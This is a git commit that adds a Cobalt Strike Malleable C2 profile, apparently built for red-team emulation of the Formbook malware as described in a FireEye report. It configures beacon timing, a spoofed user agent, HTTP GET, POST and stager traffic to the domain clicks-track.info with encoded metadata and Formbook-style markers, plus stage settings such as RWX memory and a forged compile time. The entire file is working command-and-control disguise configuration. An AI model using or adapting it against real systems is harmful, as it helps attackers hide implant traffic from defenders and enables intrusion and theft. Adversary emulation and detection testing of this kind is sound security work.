Create formbook.profile

master
xx0hcd 2017-11-03 16:34:59 -05:00 committed by GitHub
parent 64eadfdba2
commit 5f556a4948
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 136 additions and 0 deletions

136
crimeware/formbook.profile Normal file
View File

@ -0,0 +1,136 @@
#formbook malware
#taken from --> https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html
#xx0hcd
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla Firefox/4.0";
set dns_idle "8.8.8.8";
set maxdns "235";
http-get {
set uri "/list/hx28/config.php";
client {
header "Host" "www.clicks-track.info";
header "Connection" "close";
metadata {
base64url;
parameter "id";
}
}
server {
header "Server" "Apache/2.4.18 (Ubuntu)";
header "Connection" "close";
header "Content-Type" "text/html; charset=utf-8";
output {
base64url;
print;
}
}
}
http-post {
set uri "/List/hx28/config.php";
client {
header "Host" "www.clicks-track.info";
header "Connection" "close";
#header "Cache-Control" "no-cache";
header "Origin" "http://www.clicks-track.info";
header "Content-Type" "application/x-www-form-urlencoded";
header "Accept" "*/*";
#header "Referer" "http://www.clicks-track.info/list/hx28/config.php";
header "Accept-Language" "en-US";
#header "Accept-Encoding" "gzip, deflate";
output {
base64url;
print;
}
id {
base64url;
parameter "id";
#header "Cookie";
}
}
server {
header "Server" "Apache/2.4.18 (Ubuntu)";
header "Connection" "close";
header "Content-Type" "text/html; charset=utf-8";
output {
base64url;
prepend "FBNG0x31";
append "FBNG";
print;
}
}
}
http-stager {
set uri_x86 "/list/HX28/config.php";
set uri_x64 "/list/hx28/Config.php";
client {
header "Host" "www.clicks-track.info";
header "Connection" "close";
}
server {
header "Connection" "close";
header "Cache-Control" "no-cache";
header "Content-Type" "application/x-www-form-urlencoded";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Accept-Encoding" "gzip, deflate";
output {
print;
}
}
}
stage {
set userwx "true";
set compile_time "09 Jun 2012 13:19:49Z";
set image_size_x86 "747652";
set image_size_x64 "747652";
#set obfuscate "true";
}